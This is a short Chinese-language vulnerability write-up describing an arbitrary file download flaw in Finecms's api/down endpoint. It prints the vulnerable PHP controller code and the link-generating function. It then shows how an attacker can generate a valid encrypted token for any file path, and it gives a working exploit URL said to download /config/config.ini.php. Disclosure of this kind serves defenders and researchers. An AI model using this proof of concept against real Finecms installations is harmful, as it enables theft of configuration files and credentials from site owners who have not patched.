Finecms 任意文件下载

Author:Sinner
漏洞文件:
\controllers\ApiController.php Line 54

public function downAction() {
        $data = fn_authcode(base64_decode($this->get('file')), 'DECODE');
        $file = isset($data['finecms']) && $data['finecms'] ? $data['finecms'] : '';
        if (empty($file)) {
            $this->msg(lang('a-mod-213'));
        }
        if (strpos($file, ':/')) {
            //远程
            header("Location: $file");
        } else {
            //本地
            $file = str_replace('..', '', $file);
            $file = strpos($file, '/') === 0 ? APP_ROOT.$file : $file;
            if (!is_file($file)) {
                $this->msg(lang('a-mod-214') . '(#' . $file . ')');
            };
            header('Pragma: public');
            header('Last-Modified: ' . gmdate('D, d M Y H:i:s') . ' GMT');
            header('Cache-Control: no-store, no-cache, must-revalidate');
            header('Cache-Control: pre-check=0, post-check=0, max-age=0');
            header('Content-Transfer-Encoding: binary');
            header('Content-Encoding: none');
            header('Content-type: ' . strtolower(trim(substr(strrchr($file, '.'), 1, 10))));
            header('Content-Disposition: attachment; filename="' . basename($file) . '"');
            header('Content-length: ' . sprintf("%u", filesize($file)));
            readfile($file);
            exit;
        }
    }

$file 可控。前台的链接如图:

并不用去分析如何加密得来的
我们来看链接是怎么生成的
找到/extensions/function.php Line 285

function downfile($url) {
    return url('api/down', array('file' => str_replace('=', '', base64_encode(fn_authcode(array('finecms' => $url), 'ENCODE')))));
}

$url 参数为文件路径
我们本地直接调用这个函数 将我们想下载的文件路径作为参数就能得到下载链接

http://127.0.0.1//index.php?c=api&a=down&file=NDgwNTA0M2RFRXRkc1ZTaGNuczJBSjZTSk9KSDVTYnFqL251K0lNRjBQK0tla0FBTVpHM3dLbU8yVTNWaE1SYTRtRXRjUlQ3bDd4cGRQeVRKMGVlcDEvQjNRVlA4bTNnMi9SZDRDSjBOUQ
NDgwNTA0M2RFRXRkc1ZTaGNuczJBSjZTSk9KSDVTYnFqL251K0lNRjBQK0tla0FBTVpHM3dLbU8yVTNWaE1SYTRtRXRjUlQ3bDd4cGRQeVRKMGVlcDEvQjNRVlA4bTNnMi9SZDRDSjBOUQ 

为/config/config.ini.php

发表评论